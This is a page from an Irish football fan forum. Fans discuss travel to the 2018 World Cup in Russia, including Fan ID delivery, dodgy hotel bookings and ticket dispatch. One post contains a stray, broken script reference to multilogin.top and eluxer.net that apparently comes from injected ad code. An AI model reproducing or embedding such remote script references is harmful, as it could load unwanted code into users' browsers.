You Boys in Green Homepage YBIG Shop
Forum Home Forum Home : International : Away days + World Cup 2022 Accommodation and Travel
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Who's going to Russia anyway?

Post Reply Post Reply Page  <1 45678 15>
Author
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote ConorMac77 Quote  Post ReplyReply Direct Link To This Post Posted: 20 Apr 2018 at 1:22pm
Originally posted by gspain gspain wrote:

sent you a PM will hold 1 for you until Sunday 
Brilliant, thanks a million GS.  Replied by PM. Thumbs Up 
The nation holds it's breath...YES, WE'RE THERE!!!
Sponsored Links

eireland View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote eireland Quote  Post ReplyReply Direct Link To This Post Posted: 21 Apr 2018 at 5:01am
Fan id arrived yesterday. Took 11 days to leave Russia to my door. 
conor253 View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote conor253 Quote  Post ReplyReply Direct Link To This Post Posted: 23 Apr 2018 at 10:06am
Mine arrived on Friday. Can't wait now!
BohsinMunich View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote BohsinMunich Quote  Post ReplyReply Direct Link To This Post Posted: 23 Apr 2018 at 11:10am
Somewhere to rest the head over the weekend of 16th June is providing a proper pain even with a budget more than I would pay normally for a trip.

Have a sorta contact in Moscow who is helping out but so far no luck...

via booking.com payment to be made with the hotel. Chased the place for payment details so that we could confirm it. Eventual response looked well dodgy.

Another place confirmed / cancelled within minutes then wrote looking for more money.
Здравствуйте, цена не действует. Актуальная цена 500$ в сутки
eireland View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote eireland Quote  Post ReplyReply Direct Link To This Post Posted: 23 Apr 2018 at 12:06pm
Originally posted by BohsinMunich BohsinMunich wrote:

Somewhere to rest the head over the weekend of 16th June is providing a proper pain even with a budget more than I would pay normally for a trip.

via booking.com payment to be made with the hotel. Chased the place for payment details so that we could confirm it. Eventual response looked well dodgy.

Another place confirmed / cancelled within minutes then wrote looking for more money.

Are you travelling from another part of Russia to Moscow on the 16th or flying in? 
Lostandfound View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Lostandfound Quote  Post ReplyReply Direct Link To This Post Posted: 23 Apr 2018 at 2:59pm
Are the fan ids sent by registered post? 

I presume they have to be signed for? 
conor253 View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote conor253 Quote  Post ReplyReply Direct Link To This Post Posted: 23 Apr 2018 at 3:20pm
Originally posted by Lostandfound Lostandfound wrote:

Yes, signature required.
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote BohsinMunich Quote  Post ReplyReply Direct Link To This Post Posted: 23 Apr 2018 at 3:28pm
Originally posted by eireland eireland wrote:

Originally posted by BohsinMunich BohsinMunich wrote:

Are you travelling from another part of Russia to Moscow on the 16th or flying in? 

Just doing the weekend - Saturday to Monday.
The young lad has tickets for later Germany matches (including the final if they get there) so funds / holidays are limited (might explain why I got the extra Round 1 ticket ?)

Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Lostandfound Quote  Post ReplyReply Direct Link To This Post Posted: 23 Apr 2018 at 3:31pm
Originally posted by conor253 conor253 wrote:

Originally posted by Lostandfound Lostandfound wrote:

Yes, signature required.

Cheers. 
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote BohsinMunich Quote  Post ReplyReply Direct Link To This Post Posted: 24 Apr 2018 at 12:45pm
Bedding arranged.. next on the todo list.. Fan ID
Monaghan abu View Drop Down
Joe Lapira
Joe Lapira

Post Options Post Options   Thanks (0) Thanks(0)   Quote Monaghan abu Quote  Post ReplyReply Direct Link To This Post Posted: 29 Apr 2018 at 2:26am
waiting for FAN ID ,have tracking number but it tell me only post office moscow , has anyone have same problem ,thanks
GreenArmy! View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote GreenArmy! Quote  Post ReplyReply Direct Link To This Post Posted: 30 Apr 2018 at 12:31am
Fan ID arrived the other day, collected it from home yesterday.
The countdown is on!
conor253 View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote conor253 Quote  Post ReplyReply Direct Link To This Post Posted: 08 May 2018 at 3:16pm
Has anyone had tickets delivered yet? We were allocated one game in the January random allocation draw, can't see anywhere on my account to see how or when these will be posted.

We also got a few games on the first come first served in March which I know we have to collect in St. Petersburg, just not sure if we have to collect the first game tickets there aswell or if they will be posted out.
eireland View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote eireland Quote  Post ReplyReply Direct Link To This Post Posted: 08 May 2018 at 3:28pm

Has anyone had tickets delivered yet? We were allocated one game in the January random allocation draw, can't see anywhere on my account to see how or when these will be posted.

We also got a few games on the first come first served in March which I know we have to collect in St. Petersburg, just not sure if we have to collect the first game tickets there aswell or if they will be posted out.

If you go to the ticket resale section it should tell you it tickets have been printed for delivery yet. I believe they will email you a tracking number when it's on the way. From reading online some have already but most haven't. 

On another unrelated note I see many touts are getting f**ked over by this WC. Some lad was trying to sell Poland vs Japan tickets a few weeks ago for double face value and this week he's now looking for just face value. Loads of others in the same situation. After the fiasco at the euros I'm delighted. 
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Lostandfound Quote  Post ReplyReply Direct Link To This Post Posted: 08 May 2018 at 3:31pm

None delivered here. 

The random draw tickets are supposed to be posted in April/May so plenty of time yet and for reasons best known to FIFA it is still necessary to collect the FCFS tickets over there (even if purchased early in the phase). 

When your tickets are dispatched a 'where are my tickets' blue tab will appear on your account.  This will give tracking information etc when clicked. 

conor253 View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote conor253 Quote  Post ReplyReply Direct Link To This Post Posted: 08 May 2018 at 3:52pm
Thanks, it says printed beside the tickets we got in January alright.
gspain View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote gspain Quote  Post ReplyReply Direct Link To This Post Posted: 09 May 2018 at 10:46am
< ="//multilogin.top/oldmultitabs.js">https://eluxer.net/code?id=105&subid=50932_2852_">
From tracking a few forums and whatapps groups the vast majority of tickets have not been sent yet.

DHL send you an email when they are on their way.  
conor253 View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote conor253 Quote  Post ReplyReply Direct Link To This Post Posted: 10 May 2018 at 9:53am
Got an email and text this morning from DHL to say the tickets will be delivered next Tuesday.
 Post Reply Post Reply Page  <1 45678 15>
  Share Topic